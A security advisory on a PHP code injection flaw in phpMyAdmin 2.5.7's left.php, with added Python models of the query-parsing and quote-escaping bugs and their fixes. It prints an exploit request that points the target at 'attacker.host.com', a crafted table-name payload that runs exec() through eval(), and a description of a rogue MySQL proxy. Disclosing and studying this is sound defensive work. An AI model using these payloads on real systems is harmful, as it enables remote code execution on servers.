PHP code injection in phpMyAdmin 2.5.7
Software : phpMyAdmin
Version : 2.5.7
Vendor : http://www.phpmyadmin.net/
Vulnerability : PHP code injection (only if $cfg['LeftFrameLight'] is set to FALSE)
Problem-Type : remote user
phpMyAdmin is a web-based MySQL administration tool written in PHP.
There is a vulnerability in phpMyAdmin version 2.5.7.
It allows a remote user to inject PHP code that is then executed by the
eval() call in left.php.
However, the vulnerability is only exploitable if the variable $cfg['LeftFrameLight']
is set to FALSE (in config.inc.php).
1. Bugs
1.a. Ability to grow array variables through GET parameters
phpMyAdmin stores its multiple-server configuration in array variables
($cfg['Servers'][$i]), coded in config.inc.php.
They are usually set by the owner at installation time.
Each entry holds the MySQL server information phpMyAdmin uses: host, port,
user, password, authentication type, database name and so on.
Up to three server configurations are provided by default.
However, because $cfg['Servers'][$i] is left uninitialised for unused indices, a remote
user can append a server configuration to the list by growing the
$cfg['Servers'][$i] array through GET parameters.
A remote user could add a server configuration like this:
http://target/phpMyAdmin-2.5.7/left.php?server=4&cfg[Servers][4][host]=202.81.x.x&cfg[Servers][4][port]=8888&cfg[Servers][4][user]=alice .. and so forth.
The running script will then use the fourth server configuration, which the remote user supplied.
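The mechanism behind 1.a is PHP's query-string parser, which turns a bracketed key such as cfg[Servers][4][host]=x into a nested array, combined with register_globals (enabled by default in PHP of that era), which materialises request parameters as globals before config.inc.php runs; the config file then overwrites only the indices it defines, so an index it never set survives from the request. The following Python model is an added example, not code from the advisory or from phpMyAdmin: php_style_parse, select_server_vulnerable, select_server_hardened and hardened_accepts are names chosen here, CONFIGURED and REQUEST are constructed stand-ins, and numeric indices are kept as strings for simplicity (PHP would convert them to integers).

```python
# Model of advisory section 1.a (added example, not phpMyAdmin code).
import re
from urllib.parse import parse_qsl


def php_style_parse(query: str) -> dict:
    """Nest bracketed keys the way PHP does: a[b][c]=v -> {'a': {'b': {'c': 'v'}}}."""
    result = {}
    for key, value in parse_qsl(query, keep_blank_values=True):
        m = re.fullmatch(r"([^\[\]]+)((?:\[[^\]]*\])*)", key)
        if not m:
            continue  # malformed key; PHP would mangle it, we simply drop it
        path = [m.group(1)] + re.findall(r"\[([^\]]*)\]", m.group(2))
        node = result
        for part in path[:-1]:
            node = node.setdefault(part, {})
        node[path[-1]] = value
    return result


# Constructed stand-in for the servers that config.inc.php initialises.
CONFIGURED = {
    "1": {"host": "localhost", "port": "3306", "auth_type": "config"},
    "2": {"host": "db2.internal.example", "port": "3306", "auth_type": "cookie"},
}


def select_server_vulnerable(request_vars: dict):
    """register_globals semantics: a request-supplied $cfg exists first, then
    the config file overwrites only the indices it defines."""
    servers = {}
    cfg = request_vars.get("cfg")
    supplied = cfg.get("Servers", {}) if isinstance(cfg, dict) else {}
    if isinstance(supplied, dict):
        for idx, entry in supplied.items():
            if isinstance(entry, dict):
                servers[idx] = dict(entry)
    servers.update(CONFIGURED)  # config wins only where it set something
    return servers.get(request_vars.get("server", "1"))


def select_server_hardened(request_vars: dict) -> dict:
    """Configuration is never taken from the request, and the requested
    index must name an entry the config file actually defined."""
    if "cfg" in request_vars:
        raise ValueError("request attempted to supply configuration")
    idx = request_vars.get("server", "1")
    if idx not in CONFIGURED:
        raise ValueError("server index %r is not configured" % idx)
    return CONFIGURED[idx]


def hardened_accepts(query: str) -> bool:
    """True if the hardened selector would serve this query string."""
    try:
        select_server_hardened(php_style_parse(query))
        return True
    except ValueError:
        return False


# Constructed request in the shape the advisory shows (placeholder host/port).
REQUEST = ("server=4&cfg[Servers][4][host]=untrusted.example"
           "&cfg[Servers][4][port]=8889&cfg[Servers][4][auth_type]=config")

if __name__ == "__main__":
    parsed = php_style_parse(REQUEST)
    print("vulnerable picks:", select_server_vulnerable(parsed))
    print("hardened accepts:", hardened_accepts(REQUEST))
```

The two checks in select_server_hardened are the ones a defender wants regardless of PHP version: configuration arrays are initialised by the application before any request data is looked at, and a user-chosen index is validated against the entries the configuration defined rather than trusted to exist.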
1.b. Escaping the 'magic' quote (') goes wrong
If the variable $cfg['LeftFrameLight'] is set to FALSE, this part of the code is executed:
$eval_string = '$tablestack[\'' . implode('\'][\'', $_table) . '\'][\'pma_name\'][] = \'' . str_replace('\'', '\\\'', $table) . '\';';
eval($eval_string);
$eval_string is PHP code that is executed by the eval() function.
If we have one table named 'mytable', $eval_string will have the string value
$tablestack['']['pma_name'][] = 'mytable';
phpMyAdmin handles the escaping of the single quote improperly: only the quote is
escaped, so a backslash already present in the name neutralises the escape that was added.
So with a crafted table name containing meta-characters like this
\\';exec(\"touch /tmp/touchable\");/*
$eval_string will have the value
$tablestack['']['pma_name'][] = '\\';exec("touch /tmp/touchable");/*';
In PHP this consists of three statements.
The last one, a comment that is never closed, only produces a warning in PHP.
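To make the quoting defect in 1.b concrete from the defender's side, the Python below is an added example (not code from the advisory or from phpMyAdmin) that models PHP's single-quoted string rules, in which exactly two escapes exist, \\ and \', and compares the 2.5.7 escaper (quote only) with one that escapes backslashes first. read_single_quoted reports where the table-name literal really ends; the function names and SAMPLE_NAME are constructed for this example, and the sample name only contains a harmless placeholder call.

```python
# Model of the left.php quoting bug (added example, not phpMyAdmin code).

def escape_flawed(name: str) -> str:
    """The 2.5.7 behaviour: str_replace('\\'', '\\\\\\'', $table), quote only."""
    return name.replace("'", "\\'")


def escape_fixed(name: str) -> str:
    """Escape backslashes first, then quotes, so a backslash already in the
    name cannot neutralise the escape added in front of a quote."""
    return name.replace("\\", "\\\\").replace("'", "\\'")


def build_eval_string(escaped_name: str) -> str:
    """Same shape as $eval_string in left.php for a top-level table."""
    return "$tablestack['']['pma_name'][] = '" + escaped_name + "';"


def read_single_quoted(code: str, start: int):
    """Consume a PHP single-quoted literal whose opening quote is code[start].
    Returns (decoded_value, text_after_closing_quote)."""
    if code[start] != "'":
        raise ValueError("no opening quote at start")
    out = []
    i = start + 1
    while i < len(code):
        c = code[i]
        if c == "\\" and i + 1 < len(code) and code[i + 1] in "\\'":
            out.append(code[i + 1])  # \\ decodes to \ and \' decodes to '
            i += 2
        elif c == "'":
            return "".join(out), code[i + 1:]
        else:
            out.append(c)
            i += 1
    raise ValueError("unterminated single-quoted string")


def analyse(table_name: str, escaper) -> dict:
    """Build the eval string with the given escaper and report where the
    name literal ends. 'rest' is exactly ';' when the whole name stayed
    inside the literal; anything else is code that eval() would execute."""
    code = build_eval_string(escaper(table_name))
    start = code.index(" = '") + 3
    literal, rest = read_single_quoted(code, start)
    return {
        "code": code,
        "literal": literal,
        "rest": rest,
        "name_stayed_inside_literal": rest == ";" and literal == table_name,
    }


# Constructed sample: backslash, quote, a placeholder statement, open comment.
SAMPLE_NAME = "\\'; injected(); /*"

if __name__ == "__main__":
    for esc in (escape_flawed, escape_fixed):
        r = analyse(SAMPLE_NAME, esc)
        print(esc.__name__, "->", r["code"])
        print("   literal:", repr(r["literal"]), "rest:", repr(r["rest"]))
```

With escape_flawed the literal decodes to a single backslash and everything after it is live code, which is the three-statement situation the advisory describes; with escape_fixed the whole name stays inside the literal. Ordering the escapes correctly only closes this particular quoting hole: building the nested $tablestack array directly instead of composing source text for eval() removes the injection class altogether.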
2. Exploit
Since MySQL does not allow table names containing meta-characters, we have to provide a
wrapper around the MySQL server that acts as a proxy, except that, when the client
queries "SHOW TABLES", it sends a fake table name by replacing the real table name
with a string containing the exploit code.
http://target/phpMyAdmin-2.5.7/left.php?server=4&cfg[Servers][4][host]=attacker.host.com&cfg[Servers][4][port]=8889&cfg[Servers][4][auth_type]=config&cfg[Servers][4][user]=user&cfg[Servers][4][password]=pass&cfg[Servers][4][connect_type]=tcp&cfg[Servers][4][only_db]=databasename
On attacker.host.com the MySQL wrapper will listen on port 8889, waiting for a connection.
3. Proof of Concept
The MySQL wrapper, written in C, can be found in the attachment
or at http://eagle.kecapi.com/sec/codes/phpmy-expt.c
4. Purpose
This full disclosure is intended for educational purposes. Nothing else.